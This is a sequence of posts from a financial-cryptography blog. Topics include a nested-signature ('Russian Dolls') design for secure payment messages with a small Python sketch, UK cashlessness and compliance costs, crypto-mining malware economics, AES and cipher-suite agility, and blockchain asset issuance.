February 09, 2020

Russian Dolls - a design pattern for end-to-end secure transactions

Tweet thread:

This is a great research attack on a SWIFT-using payment institution (likely a British bank allowing the research to be conducted) from Oliver Simonnet.

But I was struck by how the architectural flaw leapt out and screamed HIT ME HERE! 1/17

@mikko We were able to demonstrate a proof-of-concept for a fraudulent SWIFT payment message to move money. This was done by manually forging a raw SWIFT MT103 message. Research by our Oliver Simonnet: labs.f-secure.com/blog/forging-swift-mt-payment-messages

Here’s the flaw: SAC is a flag that says signature verification and RMA (Relationship Management Application) authorisation and verification were successful.

Let me say that more clearly: SAC says verification is done. 2/17

The flaw is this: the SAC isn’t the authorisation - it’s a flag saying there was an auth. Which means, in short, SWIFT messages do not carry any role-based authorisations.

They might be authorised, but it’s like they slapped a sticker on to say that.

Not good enough. 3/17

It’s hard to share just how weird this is. Back in the mid nineties when people were doing this seriously on the net, we invented many patterns to make digital payments secure, but here we are in the ‘20s - and SWIFT and their banks haven’t got the memo. 4/17

They’ve done something: LUAs, MACs, CHKs.

But these are not authorisations over messages, they’re handshakes that carry the unchanged message to the right party. These are network-security mechanisms, not application-level authorisations - they don’t cover rogue injection. 5/17

Let’s talk about a solution. This is the pattern that Gary and I first explored in Ricardo in the mid-nineties, and Chris Odom put more flesh on the design and named it:

Russian Dolls

It works like this: 6/17

Every node is an agent. And has a signing key.

The signing key says this message is authorised - not access controlled, not authentically from me, but authorised by me, and I take the consequences if it goes wrong. 7/17

Every node signs their messages going out at the application level.

(as an aside - to see this working properly, strip out LUAs and encryption, they’re just a distraction. This will work over the open net, over raw channels.) 8/17

Every node receives inbound messages, checks they are authorised, and only then proceeds to process authorised messages. At that point it takes over responsibility - this node is now responsible for the outcomes, but only for its own processing, because it has an authorised instruction. 9/17

The present node now wraps the inbound message into its outbound message, and signs the whole message, including the received inbound.

The inbound is its authorisation to process, the outbound is an authorisation to the next node.

Then it sends to the next node. 10/17

Repeat. Hence the message grows each time. Like Russian Dolls, it recursively includes each prior step. So, to verify:

take the message you received, check it is authorised.

THEN, pull out its inner message, and verify that.

Repeat all the way to the smallest message. 11/17

This solves the SWIFT design weakness: firstly, no message injection is possible at the message layer.

You could do this over the open net and it would still be secure (where, secure means nobody can inject messages and cause a bad transaction to happen). 12/17

Secondly, as the signing key is now responsible as a proxy for the role/owner of that node, the security model is much clearer - PROTECT THAT KEY!

Thirdly, compromise of any random key isn’t enough because the attacker can’t forge the inbound.

For top points, integrate back into the customer. 13b/17

OK, if you’ve followed along & actually get the pattern, you’re likely saying “Why go to all that bother? Surely there is a better, more efficient way…”

Well, actually no, it’s an end to end security model. That should be the beginning and end of the discussion. 14/17

But there is more: The Russian Dolls pattern of role-based authorisation (note, this is not RBAC) is an essential step on the road to full triple entry:

"I know that what you see is what I see."

15/17

In triple entry, the final signed/authorised message, the Big Babushka, becomes the 'receipt'. You:

(a) reflect the Babushka back to the sender as the ACK, AND

(b) send it to SWIFT and on to the receiving bank.

Now, the receiving bank sees what client sender sees. 16/17

And you both know it. Muse on just what this does to the reconciliation and lost payments problem - it puts designs like this in sight of having reliable payments.

(But don’t get your hopes up. There are multiple reasons why it’s not coming to SWIFT any time soon.)

17/17
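To make the wrap-and-verify steps in the thread concrete, here is a minimal sketch in Python (Ed25519 via the PyNaCl library; the node names, fields and JSON encoding are my own illustrative assumptions, nothing to do with SWIFT's actual formats):

    import json
    from nacl.signing import SigningKey

    # Hypothetical roster of authorised nodes and their signing keys.
    KEYS = {name: SigningKey.generate() for name in ("customer", "bank_a")}
    ROSTER = {name: key.verify_key for name, key in KEYS.items()}

    def wrap(node, payload, inbound=None):
        """Sign an outbound message that embeds the authorising inbound message."""
        body = json.dumps({"node": node, "payload": payload,
                           "inbound": inbound.hex() if inbound else None},
                          sort_keys=True).encode()
        return bytes(KEYS[node].sign(body))          # 64-byte signature, then body

    def verify_chain(message):
        """Peel the dolls: check each layer's signature, then recurse inward."""
        layers = []
        while message is not None:
            claimed = json.loads(message[64:])["node"]          # body follows the signature
            body = json.loads(ROSTER[claimed].verify(message))  # raises on any forgery
            layers.append((claimed, body["payload"]))
            message = bytes.fromhex(body["inbound"]) if body["inbound"] else None
        return layers

    instruction = wrap("customer", {"pay": "1000 GBP", "to": "ACME"})
    forwarded = wrap("bank_a", {"route": "onwards"}, instruction)
    print(verify_chain(forwarded))   # outermost first; innermost is the customer's order

The point of the exercise: a node never acts on a payload it cannot trace, signature by signature, back to the original authorised instruction.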

Posted by iang at 04:30 PM | Comments (1)

March 16, 2019

Financial exclusion and systemic vulnerability are the risks of cashlessness

"Access to Cash Review" confirms much that we have been warning of as UK walks into its future financial gridlock. From WolfStreet:

Transition to Cashless Society Could Lead to Financial Exclusion and System Vulnerability, Study Warns

by Don Quijones • Mar 14, 2019

“Serious risks of sleepwalking into a cashless society before we’re ready – not just to individuals, but to society.”

Ten years ago, six out of every ten transactions in the UK were done in cash. Now it’s just three in ten. And in fifteen years’ time, it could be as low as one in ten, reports the final edition of the Access to Cash Review. Commissioned as a response to the rapid decline in cash use in the UK and funded by LINK, the UK’s largest cash network, the review concludes that the UK is not nearly ready to go fully cashless, with an estimated 17% of the population – over 8 million adults – projected to struggle to cope if it did.

Although the amount of cash in circulation in the UK has surged in the last 10 years from £40 billion to £70 billion and British people as a whole continue to value it, with 97% of them still carrying cash on their person and 85% keeping some cash at home, most current trends — in particular those of a technological and generational bent — are not in physical money's favor:

Over the last 10 years, cash payments have dropped from 63% of all payments to 34%. UK Finance, the industry association for banks and payment providers, forecasts that cash will fall to 16% of payments by 2027.
...

Curiously, several factors are identified which speak to current politics:


  • "ATMs — or cashpoint machines, as they’re termed locally — are disappearing at a rate of around 300 per month, leaving consumers in rural areas struggling to access cash."

  • "The elderly are widely perceived as the most reliant on cash, but the authors of the report found that poverty, not age, is the biggest determinant of cash dependency."

  • "17% of the UK population – over 8 million adults – would struggle to cope in a cashless society."

  • "Even now, there’s not enough cash in all the right places to keep a cash economy working for long if digital or power connections go down, warns the report."

I have always thought that Brexit was not a vote against Europe but a vote against London. The population of Britain split, somewhere around the 2008 crisis, into rich London and poor Britain. After the crash, London got a bailout and the poor got poorer.

By 2016-2017 the feeling in the countryside was palpably different to London. Even 100km out, people were angry. Lots of people living without decent jobs, and no understanding of why the good times had not come back after the long dark winter.

Of course the immigrants got blamed. And it was all too easy to believe the silver-tongued lie of Londoners that EU regulation was the villain.

But London is bank territory. That massive bailout kept it afloat, and on to bigger and better things. E.g., a third of all European fintech startups are in London, and that only makes sense because the goal of a fintech is to be sold to ... a bank.

Meanwhile, the banks and the regulators have been running a decade long policy on financial exclusion:

"And it’s not all going in the right direction – tighter security requirements for Know Your Customer (KYC) and Anti-Money Laundering) (AML), for example, actually make digital even harder to use for some.

Note the politically cautious understatement: KYC/AML excludes millions from digital payments. The AML/KYC system as designed gives the banks the leeway to cut out all low-end unprofitable accounts, by raising barriers to entry and by giving them carte blanche to close accounts at any time. Onboarding costs are made very high by KYC, and 'suspicion' is mandated by AML: there is no downside for the banks if they are suspicious early and often, and serious risk of huge fines if they miss one.

Moving to a cashless, exclusionary society is designed for London's big banks, but risks society in the process. Around the world, the British are the most slavish in implementing this system, and thus denying millions access to bank accounts.

And therefore jobs, trade, finance, society. Growth comes from new business and new bank accounts, not existing ones. Placing the UK banks as the gatekeepers to growth is thus a leading cause of why Britain-outside-London is in a secular depression.

Step by painful step we arrive at Brexit, which the report wrote about, albeit in roundabout terms:

Government, regulators and the industry must make digital inclusion in payments a priority, ensuring that solutions are designed not just for the 80%, but for 100% of society.

But one does not keep one's job in London by stating a truth disagreeable to the banks or regulators.

Posted by iang at 05:25 PM | Comments (0)

January 11, 2019

Gresham's Law thesis is back - Malware bid to oust honest miners in Monero

7 years after we called the cancer that is criminal activity in Bitcoin-like cryptocurrencies, here comes a report that suggests that over 4.3% of Monero has been mined by criminals.

A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth

Sergio Pastrana
Universidad Carlos III de Madrid*
spastran@inf.uc3m.es
Guillermo Suarez-Tangil
King’s College London
guillermo.suarez-tangil@kcl.ac.uk

Abstract—Illicit crypto-mining leverages resources stolen from victims to mine cryptocurrencies on behalf of criminals. While recent works have analyzed one side of this threat, i.e.: web-browser cryptojacking, only white papers and commercial reports have partially covered binary-based crypto-mining malware. In this paper, we conduct the largest measurement of crypto-mining malware to date, analyzing approximately 4.4 million malware samples (1 million malicious miners), over a period of twelve years from 2007 to 2018. Our analysis pipeline applies both static and dynamic analysis to extract information from the samples, such as wallet identifiers and mining pools. Together with OSINT data, this information is used to group samples into campaigns. We then analyze publicly-available payments sent to the wallets from mining pools as a reward for mining, and estimate profits for the different campaigns. Our profit analysis reveals campaigns with multimillion earnings, associating over 4.3% of Monero with illicit mining. We analyze the infrastructure related with the different campaigns, showing that a high proportion of this ecosystem is supported by underground economies such as Pay-Per-Install services. We also uncover novel techniques that allow criminals to run successful campaigns.

This is not the first time we've seen confirmation of the basic thesis in the paper Bitcoin & Gresham's Law - the economic inevitability of Collapse. Anecdotal accounts suggest that in the period of late 2011 and into 2012 there was a lot of criminal mining.

Our thesis was that criminal mining begets more criminal mining, and eventually pushes out the honest business in all its forms, from mining to trade.

Testing the model: Mining is owned by Botnets

Let us examine the various points along an axis from honest to stolen mining: 0% botnet mining to 100% saturation. Firstly, at 0% of botnet penetration, the market operates as described above, profitably and honestly. Everyone is happy.

But at 0%, there exists an opportunity for near-free money. Following this opportunity, one operator enters the market by turning his botnet to mining. Let us assume that the operator is a smart and careful crook, and therefore sets his mining limit at some non-damaging minimum value such as 1% of total mining opportunity. At this trivial level of penetration, the botnet operator makes money safely and happily, and the rest of the Bitcoin economy will likely not notice.

However we can also predict with confidence that the market for botnets is competitive. As there is free entry in mining, an effective cartel of botnets is unlikely. Hence, another operator can and will enter the market. If a penetration level of 1% is non-damaging, 2% is only slightly less so, and probably nearly as profitable for both of them as for one alone.

And, this remains the case for the third botnet, the fourth and more, because entry into the mining business is free, and there is no effective limit on dishonesty. Indeed, botnets are increasingly based on standard off-the-shelf software, so what is available to one operator is likely visible and available to them all.
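A toy model (mine, not the paper's and not the original thesis paper's) makes the free-entry argument visible: botnet hashrate costs its operator roughly nothing, so operators keep entering, while honest miners who must cover electricity are squeezed out as the reward gets shared ever more thinly:

    # Toy numbers only: block reward per round, honest cost per unit of hashrate.
    BLOCK_REWARD = 100.0
    HONEST_COST = 0.8
    honest, botnet = 100.0, 0.0

    for round_no in range(1, 31):
        botnet += 1.0                                  # free entry: one more botnet per round
        revenue = BLOCK_REWARD / (honest + botnet)     # reward shared across all hashrate
        while honest > 0 and revenue < HONEST_COST:    # honest miners exit at a loss...
            honest -= 1.0                              # ...botnets never do, their cost is ~0
            revenue = BLOCK_REWARD / (honest + botnet)
        print(f"round {round_no:2d}: botnet share {botnet / (honest + botnet):5.1%}")

The botnet share only ever goes up, because nothing on the cost side pushes the dishonest miners back out.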

What stopped it from happening in 2012 and onwards? Consensus is that ASICs killed the botnets. Because serious mining firms moved to using large custom rigs of ASICs, and as these were so much more powerful than any home computer, they effectively knocked the criminal botnets out of the market. Which the new paper acknowledged:

... due to the proliferation of ASIC mining, which uses dedicated hardware, mining Bitcoin with desktop computers is no longer profitable, and thus criminals’ attention has shifted to other cryptocurrencies.

Why is botnet mining back with Monero? Presumably because Monero uses an ASIC-resistant algorithm that is best served by GPUs. It is also a heavyweight privacy coin, which works nicely for honest people with privacy problems but also works well to hide criminal gains.

Posted by iang at 05:01 PM | Comments (11)

October 19, 2018

AES was worth $250 billion dollars

So says NIST...

10 years ago I annoyed the entire crypto-supply industry:

Hypothesis #1 -- The One True Cipher Suite

In cryptoplumbing, the gravest choices are apparently on the nature of the cipher suite. To include latest fad algo or not? Instead, I offer you a simple solution. Don't.

There is one cipher suite, and it is numbered Number 1.
Ciphersuite #1 is always negotiated as Number 1 in the very first message. It is your choice, your ultimate choice, and your destiny. Pick well.

The One True Cipher Suite was born of watching projects and groups wallow in the mire of complexity, as doubt caused teams to add multiple algorithms - a complexity that easily doubled the cost of the protocol with consequent knock-on effects & costs & divorces & breaches & wars.

It - The One True Cipher Suite as an aphorism - was widely ridiculed in crypto and standards circles. Developers and standards groups like the IETF just could not let go of crypto agility, the term that was born to champion the alternative. This sacred cow led the TLS group to field something like 200 standard suites in SSL and radically reduce them to 30 or 40 over time.

Now, NIST has announced that AES, as a single standard algorithm, delivered $250 billion in economic benefit over the 20 years of its project lifetime - from 1998 to now.

h/t to Bruce Schneier, who also said:

"I have no idea how to even begin to assess the quality of the study and its conclusions -- it's all in the 150-page report, though -- but I do like the pretty block diagram of AES on the report's cover."

One good suite based on AES allows agility within the protocol to be dropped. Entirely. Instead, upgrade the entire protocol to an entirely new suite, every 7 years. I said, if anyone was asking. No good algorithm lasts less than 7 years.
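A sketch of what the aphorism might look like in code - the hello carries only a protocol version, and the version names the complete suite, so there is nothing left to negotiate per algorithm (the version numbers and algorithm names here are illustrative, not from any standard):

    # The protocol version names the complete suite; there is nothing to negotiate.
    SUITES = {
        1: {"kex": "X25519", "cipher": "AES-256-GCM", "hash": "SHA-256"},
        # Version 2, when it comes, replaces the entire suite - not one algorithm.
    }

    def open_session(peer_version):
        """Accept the peer's hello; an unknown version means 'upgrade', never 'downgrade'."""
        try:
            return SUITES[peer_version]
        except KeyError:
            raise ValueError(f"unknown protocol version {peer_version}")

    print(open_session(1))   # the one suite - no agility, no downgrade surface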

Crypto-agility was a sacred cow that should have been slaughtered years ago, but maybe it took this report from NIST to lay it down: $250 billion of benefit.

In another footnote, we of the Cryptix team supported the AES project because we knew it was the way forward. Raif built the Java test suite and others in our team wrote and deployed contender algorithms.

Posted by iang at 05:11 PM | Comments (2)

June 25, 2018

FCA on Crypto: Just say no.

Because it's Sunday, I thought I'd write a missive on that favourite depressing topic, the current trend of the British nation to practice economic self-immolation. I speak of course of the FCA's letter to the CEO.

Some may be bemused and think that this letter shows signs of progress. No such. What the letter literally is, is the publication of a hitherto secret order sent to CEOs of banks not to bank crypto.

The instruction was delivered some time ago. Verbally. And deniably. The banks knew it, the FCA knew it, but all denied it unless under condition of confidentiality or alcohol.

Which put the FCA, the banks, and Britain into considerable difficulties - the FCA could not move forward to adjust because there was no public position to adjust, the British banks could not bank crypto because they were under instruction, and the British crypto-using public either got screwed by the banks or they left the country for Europe and places further afield.

(Oddly, it turns out that Berlin is the major beneficiary here, but that's a salacious distraction.)

After some pressure over this 'star chamber' process of business policy, it transpired a week ago that the FCA has come out of the cold and issued the actual instruction in writing. This is now sufficient to replace the secret instruction, so it represents a movement of sorts. We can now at least openly debate it.

However the message has not changed. To understand this, one has to read the entire letter and also has to know quite a lot about banks, compliance and the fine art of nay-saying while appearing to be encouraging.

The tone is set early on:

CRYPTOASSETS AND FINANCIAL CRIME

As evidence emerges of the scope for cryptoassets to be used for criminal purposes, I am writing regarding good practice for how banks handle the financial crime risks posed by these products.

There are many non-criminal motives for using cryptoassets.

It's all about financial crime. The assumption is that crypto is probably used for financial crime, and the banks' job is to stop that happening. Which would logically set a pretty high bar because (like money, which is also used for financial crime) the use of crypto (money) by customers is generally opaque to the bank. But banks are used to being the frontline soldiers in the war on finance, so they will not notice a change here.

The problem is of course that it simply doesn't work. The bank can't see what you are doing with crypto, so what to do? When the banks ask customers what they do with the money, costs skyrocket, but the quality of the information doesn't increase.

There is therefore only one equilibrium in this mathematical puzzle that the FCA has set the banks: Just say no. Shut down any account that uses crypto. Because we will hold you responsible for it and we will insist on no failures.

Now, if it was just that, a dismal letter conflating crime with business, one could argue the toss. But the letter goes on. Here's the smoking gun:

Following a risk-based approach does not mean banks should approach all clients operating in these activities in the same way. Instead, we expect banks to recognise that the risk associated with different business relationships in a single broad category can vary, and to manage those risks appropriately.

The risk-based approach!

Once that comes into play, what the bank reads is that they are technically permitted to use crypto, but they are strictly liable if it goes wrong. Because they've been told to do their risk analysis, and they've done their risk analysis, and therefore the risks are 'analysed' - which gets conflated with 'reduced to zero'.

Which means they can only touch crypto if they *know*. This knowledge being full knowledge, not that other long-running joke called KYC. Banks must know that the crypto is all and totally bona fide.

But they generally have no such tool over customers, because (a) they are bankers and if they had such a tool (b) they wouldn't be bankers, they would be customers.

(NB., to those who know their history, anglo-world banks used to know their customers' business quite well. But that went the way of the local branch manager and the dodo. It was all replaced by online, national computer networks, and now AIs that do not manifestly know anything other than how to spit out false positives. NB2 - this really only refers to the anglo world being UK, USA, AU, CAN, NZ and the smaller followers. Continental banking and other places follow a different path.)

Back to today. The upshot of the relationship for regulator-bank in the anglo world is this: "risk-based analysis" is code for "if you get it wrong, you're screwed." Which latter part is code for fines and so forth.

So what is the significance of this, other than the British policy of not doing crypto as a business line (something that Berlin, Gibraltar, Malta, Bermuda and others are smiling about)? It's actually much more devastating than one would think.

It's not about just crypto. As a society, we don't care about crypto more than as a toy for rich white boys to play at politics and make money without actually doing anything. Fun for them, soap opera for observers but the hard work is elsewhere.

It's not in the crypto - it's in the compliance. As I wrote elsewhere, banks in the anglo world and their regulators are locked in a deadly embrace of compliance. It has gotten to the point where all banking product is now driven by compliance, and not by customer service, or by opportunity, or by new product.

In that missive on Identity written for R3's member banks, I made a startling claim:

FITS – the Financial Identity Trilemma Syndrome

If you’re suffering from FITS, it might be because of compliance. As discussed at length in the White Paper on Identity, McKinsey has called out costs of compliance as growing at 20% year on year. Meanwhile, the compliance issue has boxed in and dumbed down the security, and reduced the quality of the customer service. This is not just an unpleasantness for customers, it’s a danger sign – if customers desert because of bad service, or banks shed them to reduce risk of fines, then banks shrink, and in the current environment of delicate balance sheets, rising compliance costs and a recessionary economy, reduction in bank customer base is a life-threatening issue.

For those who are good with numbers, you'll pretty quickly realise that 20% is great if it is profits or revenues or margin or one of those positive numbers, but it's death if it is cost. And, compliance is *only a cost*. So, death.

Which led us to wonder how long this can go on?

(youtube, transcript) Cost to compliance now is about 30% I’ve heard, but you pick your own number. Who works at a bank? Nobody, okay. That’s probably good news. [laughs] Who’s got a bank account? I’ve got bad news: if you do the compounding, in seven years you won’t have a bank account, because all the banks will be out of money. If you compound 30% forward by 20%, in seven years all of the money is consumed on compliance.

As I salaciously said at a recent Mattereum event on Identity, the British banks have 7 years before they die. That's assuming a 30% compliance cost today and a 20% year-on-year increase. You could pick 5% now and 10% by 2020, as Duff & Phelps did, which perversely seems more realistic: if the load is already 30%, then the banks are already dead - we don't need to wait until it reaches 100%. Either way, there is gloom and doom however society looks at it.
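The arithmetic behind that seven-year figure is simple compounding - start from an assumed 30% compliance share and grow it 20% a year:

    share = 0.30                  # assumed compliance share of bank costs today
    for year in range(1, 11):
        share *= 1.20             # 20% year-on-year growth in compliance costs
        print(f"year {year}: compliance ~ {share:.0%} of the cost base")
        if share >= 1.0:          # by year 7, compliance eats the entire cost base
            break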

Now these are stupid numbers and bloody stupid predictions. The regulators are going to kill all the banks? Nah... that can only be believed with compelling evidence.

The FCA letter to the CEO is that compelling evidence. The FCA has doubled down on compliance. They have now, I suspect, achieved their 20% increase in compliance costs for this year, because now the banks must double down and test all accounts against crypto-closure policy. More.

We are one year closer to banking Armageddon - thanks, FCA.

What can we see here? Two things. Firstly, it cannot go on. Even Mark Carney must know that burning the banking village to save it is going to put Britain into the mother of all recessions. So they have to back off sometime, but when will that be? If I had to guess, it will be when major clients in the City of London desert the British banks, because no other message is heard in Whitehall or Threadneedle St. C.f., Brexit. Business itself isn't really listened to, or in the immortal words of the British Foreign Secretary,

Secondly, is it universal? No. There is a glimmer of hope. The major British banks cannot do crypto because the costs are asymmetric. But for a crypto bank that is constructed from ground up, within the FCA's impossible recipe, the costs are manageable. Such a bank would basically impose the crypto-compliance costs over all, so all must be in crypto. An equilibrium available to a specialist bank, not any high street dinosaur.

You might call that a silver lining. I call it a disaster. The regulators are hell bent on destroying the British economy by adding 20% extra compliance burden every year - note that they haven't begun to survey their costs, nor the costs to society.

After the collapse there will be green shoots, and we should cheer? Shoot me now.

Frankly, the broken window fallacy would be better than that process - we should just topple the banks with crypto right now and get the pain over with, because a fast transition is better than the FCA smothering the banks with compliance love.

But, obviously, the mandarins in Whitehall think differently. Watch the next seven years to learn how British people live in interesting times.

Posted by iang at 07:02 AM | Comments (2)

May 05, 2017

4th ed. Electronic Evidence now available

Stephen Mason has released the 4th edition of Electronic Evidence at

Electronic Evidence (4th edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study, University of London, 2017)

http://ials.sas.ac.uk/digital/humanities-digital-library/observing-law-ials-open-book-service-law/electronic-evidence

Note that this is free to download, and it's a real law book, so we're entering a new world of accessibility to this information. The following are also freely available:

Electronic Signatures in Law (4th edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study, University of London, 2016)
http://ials.sas.ac.uk/digital/humanities-digital-library/observing-law-ials-open-book-service-law/electronic-signatures

Free journal: Digital Evidence and Electronic Signature Law Review
http://journals.sas.ac.uk/deeslr/
(also available in the LexisNexis and HeinOnline electronic databases)

http://stephenmason.co.uk/

For those of us who spend a lot of time travelling around, free digital downloads are a gift from heaven!

Posted by iang at 02:00 PM | Comments (0)

November 04, 2015

FC wordcloud

Courtesy of statistical analysis over this site by Uyen Ng.

Posted by iang at 02:39 PM | Comments (0)

October 25, 2015

When the security community eats its own...

If you've ever wondered what that Market for Silver Bullets paper was about, here's Pete Herzog with the easy version:

When the Security Community Eats Its Own

BY PETE HERZOG
http://isecom.org

The CEO of a Major Corp. asks the CISO if the new exploit discovered in the wild, Shizzam, could affect their production systems. He said he didn't think so but, just to be sure, they would analyze all the systems for the vulnerability.

So his staff is told to drop everything, learn all they can about this new exploit and analyze all systems for vulnerabilities. They go through logs, run scans with FOSS tools, and even buy a Shizzam plugin from their vendor for their AV scanner. They find nothing.

A day later the CEO comes and tells him that the news says Shizzam likely is affecting their systems. So the CISO goes back to his staff to have them analyze it all over again. And again they tell him they don’t find anything.

Again the CEO calls him and says he’s seeing now in the news that his company certainly has some kind of cybersecurity problem.

So, now the CISO panics and brings on a whole incident response team from a major security consultancy to go through each and every system with great care. But after hundreds of man hours spent doing the same things they themselves did, they find nothing.

He contacts the CEO and tells him the good news. But the CEO tells him that he just got a call from a journalist looking to confirm that they’ve been hacked. The CISO starts freaking out.

The CISO tells his security guys to prepare for a full security upgrade. He pushes the CIO to authorize an emergency budget to buy more firewalls and secondary intrusion detection systems. The CEO pushes the budget to the board who approves the budget in record time. And almost immediately the equipment starts arriving. The team works through the nights to get it all in place.

The CEO calls the CISO on his mobile – rarely a good sign. He tells the CISO that the NY Times just published that their company allegedly is getting hacked Sony-style.

They point to the newly discovered exploit as the likely cause. They point to blogs discussing the horrors the new exploit could cause, and what it means for the rest of the smaller companies out there who can’t defend themselves with the same financial alacrity as Major Corp.

The CEO tells the CISO that it's time they bring in the FBI. So he needs him to come explain himself and the situation to the board that evening.

The CISO feels sick to his stomach. He goes through the weeks of reports, findings, and security upgrades. Hundreds of thousands spent and - nothing! There's NOTHING to indicate a hack or even a problem from this exploit.

So wondering if he’s misunderstood Shizzam and how it could have caused this, he decides to reach out to the security community. He makes a new Twitter account so people don’t know who he is. He jumps into the trending #MajorCorpFail stream and tweets, "How bad is the Major Corp hack anyway?"

A few seconds later a penetration tester replies, "Nobody knows xactly but it’s really bad b/c vendors and consultants say that Major Corp has been throwing money at it for weeks."

Read on for the deeper analysis.

Posted by iang at 06:04 AM | Comments (0)

June 12, 2015

Issuance of assets, Genesis of transactions, contracting for swaps - all the same stuff


Here's what Greg Maxwell said about asset issuance in sidechains:

So the idea behind the issued assets functionality in Elements is to explicitly tag all of the tokens on the network with an asset type, and this immediately lets you use an efficient payment verification mechanism like bitcoin has today. And then all of the accounting rules can be grouped by asset type. Normally in bitcoin your transaction has to ensure that the sum of the coins that comes in is equal to the sum that come out to prevent inflation. With issued assets, the same is true for the separate assets, such that the sum of the cars that come in is the same as the sum of the cars that come out of the transaction or whatever the asset is. So to issue an asset on the system, you use a new special transaction type, the asset issuance transaction, and the transaction ID from that issuance transaction becomes the tag that traces them around. So this is early work, just the basic infrastructure for it, but there's a lot of neat things to do on top of this. *This is mostly the work of Jorge Tímon*.
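A minimal sketch of the accounting rule Maxwell describes - group a transaction's inputs and outputs by asset tag and require each group to balance (the field names and tags here are illustrative, not the Elements wire format):

    from collections import defaultdict

    def balanced(inputs, outputs):
        """inputs/outputs are (asset_tag, amount) pairs; every asset must net to zero."""
        sums = defaultdict(int)
        for tag, amount in inputs:
            sums[tag] += amount
        for tag, amount in outputs:
            sums[tag] -= amount
        return all(net == 0 for net in sums.values())

    tx_in  = [("asset:9f3c", 2), ("bitcoin", 5)]      # 2 "cars" and 5 coins come in
    tx_out = [("asset:9f3c", 2), ("bitcoin", 5)]      # the same must come out
    assert balanced(tx_in, tx_out)                    # no asset inflated or destroyed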

Jorge documented all this back in 2013 in FreiMarkets with Mark Friedenbach. Basically he's adding issuance to the blockchain, which I also covered in principle back in that talk in January at PoW's Tools for the Future. As he covers issuance above, here's what I said about another aspect, being the creation of a new blockchain:

Where is this all going? We need to make some changes. We can look at the blockchain and make a few changes. It sort of works out that if we take the bottom layer, we've got a bunch of parameters from the blockchain, these are hard coded, but they exist. They are in the blockchain software, hard coded into the source code.

So we need to get those parameters out into some form of description if we're going to have hundreds, thousands or millions of block chains. It's probably a good idea to stick a smart contract in there, whose purpose is to start off the blockchain, just for that purpose. And having talked about the legal context, when going into the corporate scenario, we probably need the legal contract -- we're talking text, legal terms and blah blah -- in there and locked in.

We also need an instantiation, we need an event to make it happen, and that is the genesis transaction. Somehow all of these need to be brought together, locked into the genesis transaction, and out the top pops an identifier. That identifier can then be used by the software in various and many ways. Such as getting the particular properties out to deal with that technology, and moving value from one chain to another.

This is a particular picture which is a slight variation on what is going on with current blockchain technology, but it can lead in to the rest of the devices we've talked about.
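One way to read "out the top pops an identifier" is as a hash over everything that was locked into the genesis transaction - the chain parameters, the legal prose and the bootstrap smart contract. A sketch, with every field name hypothetical:

    import hashlib, json

    def genesis_id(params, legal_text, contract_code):
        """Bind parameters, prose and code into one identifier for the new chain."""
        blob = (json.dumps(params, sort_keys=True).encode()
                + legal_text.encode() + contract_code)
        return hashlib.sha256(blob).hexdigest()

    chain_id = genesis_id(
        {"block_interval_s": 600, "max_supply": 21_000_000},
        "This chain operates under the following terms and conditions ...",
        b"<compiled bootstrap contract>",
    )
    print(chain_id)   # thereafter names the chain, its rules and its assets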

The title of the talk is "The Sum of all Chains - Let's converge" for a reason. I'm seeing the same thinking in variations go across a bunch of different projects all arriving at the same conclusions.

It's all the same stuff.

Here's today's "legathon" at UBS, at which the banking chaps tried to figure out how to handle a swap of GBP and Canadian Dollars that goes sour - because of a bug, or a lapse in understanding, or a hack, who knows? The two traders end up in court trying to resolve their difference in views.

In the court, the judge asks for the evidence -- where is the contract? So it was discovered that the two traders had entered into a legal contract that was composed of the prose document (top black box) and the smart contract thingie (lower black box). Then some events had happened, but somehow we hadn't got to the end. At this point there is a deep dive into the tech and the prose and the philosophy, law, religion and anything else people can drag in.

However, there's a shortcut. On that prose on the whiteboard, the lawyer chap whose name escapes me wrote 3 clauses. Clause (1) said:

(1) longest chain is correct chain

See where this is going? The judge now asks which is the longest chain. One side looks happy, the other looks glum.

Let's converge; on the longest chain, *if that's what you wrote down*.

Posted by iang at 05:34 AM | Comments (0)

June 05, 2015

Coase's Blockchain - the first half block - Vinay Gupta explains triple entry

Editor's Preamble! Back in 1997 I gave a paper on crowdfunding - I believe the first ever proper paper, although there was one "lost talk" earlier by Eric Hughes - at Financial Cryptography 1997. Now, this conference was the first polymath event in the space, and probably the only one in the space, but that story is for another day. Because this was a polymath event, law professor Michael Froomkin stood up and asked why I hadn't analysed the crowdfunding system from the point of view of transaction economics.

I blathered - because I'd not heard of it! But I took the cue, went home and read the Ronald Coase paper, and some of his other stuff, and ploughed through the immensely sticky earth of Williamson. Who later joined Coase as a Nobel Laureate.

The prof was right, and I and a few others then turned transaction cost discussion into a cypherpunk topic. Of course, we were one or two decades too early, and hence it all died.

Now, with gusto, Vinay Gupta has revived it all as an explanation of why the blockchain works. Indeed, it's as elegant a description of 'why triple entry' as I've ever heard! So here goes my Saturday writing out Coase's first half block, or the first 5 minutes of Gupta's talk.



This is the title of the talk - Coase's Blockchain. Does anyone in the audience know who Ronald Coase was? No? Ok. He got the Nobel Prize for Economics in 1991. Coase's question was, why does the company exist as an institution? Theoretically, if markets are more efficient than command economies, because of a better distribution of information, why do we then recreate little pockets of command economy in the form of a thing you call a company?

And, understanding why the company exists is a critical thing if you want to start companies or operate companies because the question you have to ask is why are we doing this rather than having a market of individual actors. And Coase says, the reason that we don't have seas of contractors, we've got structures like say IBM, is because making good decisions is expensive.

Last time you bought a telephone or a television or a car you probably spent 2 days on the Internet looking at reviews trying to make a decision, right? Familiar experience? All of that is a cost, that in a company is made by purchasing. Same thing for deciding strategy, if you're a small business person you spend a ton of time worrying about strategy, and all of those costs in a large company are amortised across the whole company. The company serves to make decisions and then amortise the costs of the decisions across the entire structure.

This is all essentially about transaction costs. Now, move onto Venture Capital.

Paul Graham's famous essay "Black Swan Farming." What they basically say is venture capitalists have no idea what will or won't work, we can't tell. We are in the business of guessing winners, but it turns out that our ability to successfully predict is less than one in a hundred. Of a hundred companies we fund, 90 will fail, 10 will make about 10 times what we put into them, and one in about a thousand will make us a ton of money. One thousand to one returns are higher, but we actually have no way of telling which is which, so we just fund everything.

Even with their very large sample size, they are unable to successfully predict what will or will not succeed. And if this is true for venture capitalists, how much truer is it for entrepreneurs? As a venture capitalist, you have an N of maybe 600 or 1000, as an entrepreneur you've got an N of 2 or 3. All entrepreneurs are basically guessing that their thing might work with totally inadequate evidence and no legitimate right to assume their guess is any good because if the VCs can't tell, how the heck is the entrepreneur supposed to tell?

